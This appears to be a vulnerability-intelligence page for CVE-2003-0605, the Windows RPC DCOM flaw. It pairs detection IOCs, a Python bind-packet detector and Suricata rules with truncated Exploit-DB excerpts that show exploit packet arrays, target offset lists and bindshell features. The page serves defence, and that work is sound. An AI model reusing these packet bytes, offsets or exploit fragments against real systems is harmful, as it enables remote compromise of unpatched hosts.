CVE-2003-0605
Published 2003-08-27
Priority: P2 · 64 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 60.80% (99.0th percentile)
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
Detection & IOCs (extracted from sources)
bytes: 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 a0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00
bytes: 05 00 00 03 10 00 00 00 E8 03 00 00 E5 00 00 00 D0 03 00 00 01 00 04 00 05 00 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE 74 2C 96 D2
bytes: 20 00 00 00 00 00 00 00 20 00 00 00 5C 00 5C 00
bytes: 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00
bytes: 01 10 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 00 00 00 00
bytes: 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 46 00 58 00
- The exploit targets TCP port 135 (primary) but also works on ports 139, 445, and 539; monitor for malformed DCE/RPC BIND requests (starting with 05 00 0B 03) on all four ports.
- Detect the characteristic RPC BIND packet header bytes 05 00 0B 03 followed by the DCOM interface UUID a0 01 00 00 ... C0 00 00 00 00 00 00 46 ... 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 in the TCP payload.
- The exploit request payload contains the distinctive MEOW (4D 45 4F 57) marker and MARB (4D 41 52 42) strings embedded in the DCE/RPC request; alert on these byte sequences within RPC traffic on ports 135/139/445.
- The shellcode NOP sled prefix in the exploit is a repeated Unicode-safe sequence 46 00 58 00 4E 00 42 00; detect this pattern in RPC request payloads as a strong indicator of an exploitation attempt.
- After successful exploitation the attacker connects to a bind shell on the victim; monitor for unexpected inbound connections to port 666 (default) or 4444 on a previously targeted host.
- The Blaster/MSblast/LovSAN worm exploits this CVE; DCE implementations including HP OpenView may hang or terminate upon receiving the malformed exploit packets, so monitor for RPC service crashes or hangs following inbound port 135 traffic.
- The request3 buffer encodes a UNC-style path \\<host>\C$\123456111111111111111111.doc in little-endian Unicode; detect oversized UNC path strings in DCOM RPC requests as an exploitation indicator.
- The exploit supports multiple target offsets across Windows NT SP4/SP5/SP6, Windows 2000 (no SP through SP4) in English, Chinese, Polish, German, Japanese, Korean, Mexican, and Kenyan locales, and Windows XP SP0/SP1/SP2; a single return address will not cover all targets, so detection must rely on payload byte patterns rather than specific return addresses.
- The exploit is functional on ports beyond 135 (also 139, 445, 593); perimeter filtering of only port 135 is insufficient to block exploitation.
- A return-into-libc variant of this exploit (rpc!exec) was demonstrated to bypass non-executable memory protections including OverflowGuard and StackDefender; NX/DEP-based mitigations alone are not sufficient to prevent exploitation.
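The BIND-header indicator above can be checked structurally rather than by a raw byte match. The following is an added example, not code from any of this page's sources: it parses a connection-oriented DCE/RPC bind PDU, extracts the abstract-syntax UUID of each presentation context, and reports binds to the two DCOM activation interfaces (ISystemActivator, the UUID in the bindstr bytes quoted above, and IRemoteActivation, the UUID the Suricata rules below match on). The sample input is the bindstr bytes from this page; the second sample is constructed from it by swapping in the IRemoteActivation UUID.

```python
import struct
import uuid

# Well-known DCOM activation interface IDs, keyed by canonical UUID string.
DCOM_ACTIVATION_IIDS = {
    "000001a0-0000-0000-c000-000000000046": "ISystemActivator",
    "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57": "IRemoteActivation",
}

RPC_VER, PDU_BIND, PFC_FIRST_FRAG = 5, 0x0B, 0x01


def parse_bind(payload: bytes):
    """Parse a connection-oriented DCE/RPC bind PDU (little-endian NDR).

    Returns header fields plus (ctx_id, abstract-syntax UUID) per context,
    or None when the bytes are not a complete, well-formed bind.
    """
    if len(payload) < 28:
        return None
    ver, ptype, flags = payload[0], payload[2], payload[3]
    if ver != RPC_VER or ptype != PDU_BIND or not (flags & PFC_FIRST_FRAG):
        return None
    if payload[4] & 0xF0 != 0x10:      # data representation must be little-endian
        return None
    frag_len, auth_len, call_id = struct.unpack_from("<HHI", payload, 8)
    if frag_len > len(payload):        # truncated fragment: do not guess
        return None
    max_xmit, max_recv, assoc_group, n_ctx = struct.unpack_from("<HHIB", payload, 16)
    off = 28                           # 16-byte common header + 12-byte bind fields
    contexts = []
    for _ in range(n_ctx):
        if off + 24 > frag_len:
            return None
        ctx_id, n_syntax = struct.unpack_from("<HB", payload, off)
        iid = uuid.UUID(bytes_le=payload[off + 4:off + 20])
        contexts.append((ctx_id, str(iid)))
        off += 4 + 20 + 20 * n_syntax  # ctx header, abstract syntax, transfer syntaxes
    return {"call_id": call_id, "frag_len": frag_len, "max_xmit": max_xmit,
            "assoc_group": assoc_group, "contexts": contexts}


def dcom_activation_bind(payload: bytes):
    """Names of DCOM activation interfaces this bind targets ([] if none)."""
    parsed = parse_bind(payload)
    if parsed is None:
        return []
    return [DCOM_ACTIVATION_IIDS[iid] for _, iid in parsed["contexts"]
            if iid in DCOM_ACTIVATION_IIDS]


# Sample input: the bindstr bytes quoted on this page.
BINDSTR = bytes.fromhex(
    "05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 "
    "D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 "
    "a0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 00 00 "
    "04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 "
)
# Constructed variant: same bind with the IRemoteActivation UUID (the Suricata rule's bytes).
REMOTE_ACTIVATION_BIND = (BINDSTR[:32]
                          + uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57").bytes_le
                          + BINDSTR[48:])

if __name__ == "__main__":
    for name, pkt in (("bindstr", BINDSTR), ("remote-activation", REMOTE_ACTIVATION_BIND)):
        print(name, parse_bind(pkt)["call_id"], dcom_activation_bind(pkt))
```

A bind to either interface is normal DCOM traffic from trusted hosts; the alert value lies in such binds arriving from outside the perimeter or from hosts that never act as DCOM clients.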
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 7.5 HIGH
GHSA
GHSA-r23f-ff9f-8vcc (CVE-2003-0746, HIGH) · ghsa_unreviewed · 2022-05-03 · CVSS 7.5
Various Distributed Computing Environment (DCE) implementations, including HP OpenView, allow remote attackers to cause a denial of service (process hang or termination) via certain malformed inputs, as triggered by attempted exploits against the vulnerabilities CVE-2003-0352 or CVE-2003-0605, such as the Blaster/MSblast/LovSAN worm.
GHSA
GHSA-fvvx-2crq-42fr (CVE-2003-0605, HIGH) · ghsa_unreviewed · 2022-04-29
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
VulnCheck
Windows 2000 SP3 and SP4 PerformScmStage function Vulnerability (CVE-2003-0605, HIGH) · vulncheck · 2003 · CVSS 7.5
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/Widespread+use+of+RPC+DCOM+Exploit/21/
Suricata
GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt (CVE-2003-0528) · suricata · 2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx
Suricata
GPL NETBIOS DCERPC Remote Activation bind attempt (CVE-2003-0528) · suricata · 2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:17; metadata:created_at 2010_09_23, cve CVE_2003_0528, signature_severity Informational, updated_at 2024_03_08;)
Exploit-DB · exploitdb · 2003-11-07
CVE-2003-0605 Microsoft Windows XP/2000 - RPC Remote Non Exec Memory
---
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include
* #include
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* ad
Exploit-DB · exploitdb · 2003-10-09
CVE-2003-0605 Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)
---
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* And cause a Denial of Service on patched systems (rpc3) */
#include
#include
#include
#include
#include
#include
FILE *fp1;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char r
Exploit-DB · exploitdb · 2003-09-20
CVE-2003-0605 Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)
---
/*
RPCDCOM2.c ver1.1
copy by FLASHSKY flashsky at xfocus.org 2003.9.14
*/
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x5
Exploit-DB · exploitdb · 2003-09-12
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)
---
/*
dcom2_scanner.c
scan for second dcom vulnerability (MS03-039)
by Doke Scott, doke at udel.edu, 10 Sep 2003
based on work by:
* buildtheb0x presents : dcom/rpc scanner
* ---------------------------------------
* by: kid and farp
and on packet sniffs of MS's dcom2 scanner
*/
#define d_dcom_scan_timeout 5 // max seconds for individual dcom scan
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define null NULL
// for sun spro cc weirdness? seg faults without this
#define my_inet_ntoa(ip) inet_ntoa( *( (struct in_addr *) &ip ) )
static char *program_name;
static int verbose = 0;
int dcom_scan_timeout = d_dcom_scan_timeout;
volatile int timed_out = 0;
volatile int dc
Exploit-DB · exploitdb · 2003-08-07
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (Universal)
---
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation. It also has several other options including definable
* bindshell and attack ports.
*
* Features:
*
* -d destination host to attack.
*
* -p for port selection as exploit works on ports other than 135(139,445,539 etc)
*
* -r for using a custom return address.
*
* -t to select target type (Offset) , this includes universal offsets for -
* win2k and winXP (Regardless of service pack)
*
* -l to select bindshell port on remote machine (Default: 666)
*
* - Shellcode has been modified to call ExitThread, rath
Exploit-DB · exploitdb · 2003-07-30
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (2)
---
//////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
//
// English - French - Chinese - Polish - German
// Japanese - Korean - Mexican - Kenyan
//
// Tks to all world wide contributors (Public Property)
//
// New Targets ? [email protected]
//
//////////////////////////////////////////////////////////////////////////
#include
#include
#include
#pragma comment(lib,"ws2_32")
#define DWORD unsigned long
WSADATA wsa;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0
Exploit-DB · exploitdb · 2003-07-29
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (1)
---
//////////////////////////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 18 Targets
// by pHrail and smurfy + some offsets by teos
//
// Targets:
// 0 Win2k Polish nosp ver 5.00.2195
// 1 Win2k Polish +sp3 ver 5.00.2195
// 2 Win2k Spanish +sp4
// 3 Win2k English nosp 1
// 4 Win2k English nosp 2
// 5 Win2k English +sp1
// 6 Win2k English +sp2 1
// 7 Win2k English +sp2 2
// 8 Win2k English +sp3 1
// 9 Win2k English +sp3 2
// 10 Win2k English +sp4
// 11 Win2k China +sp3
// 12 Win2k China +sp4
// 13 Win2k German +sp3
// 14 Win2k Japanese +sp2
// 15 WinXP English nosp ver 5.1.2600
// 16 WinXP English +sp1 1
// 17 WinXP English +sp1 2
// 18 WinXP English +sp2
//
//////////////////////
Exploit-DB · exploitdb · 2003-07-26
CVE-2003-0605 Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)
---
/*
DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code
Written by H D Moore
- Usage: ./dcom
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5
Exploit-DB · exploitdb · 2003-07-25
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow
---
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0x
Exploit-DB · exploitdb · 2003-07-21
CVE-2003-0605 Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service
---
// This is a new unpatched vulnerability - NOT the MS03-026
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x3
No writeups or analysis indexed.
References:
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006851.html
http://marc.info/?l=bugtraq&m=105880332428706&w=2
http://www.cert.org/advisories/CA-2003-19.html
http://www.cert.org/advisories/CA-2003-23.html
http://www.kb.cert.org/vuls/id/326746
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-039
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1118
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A494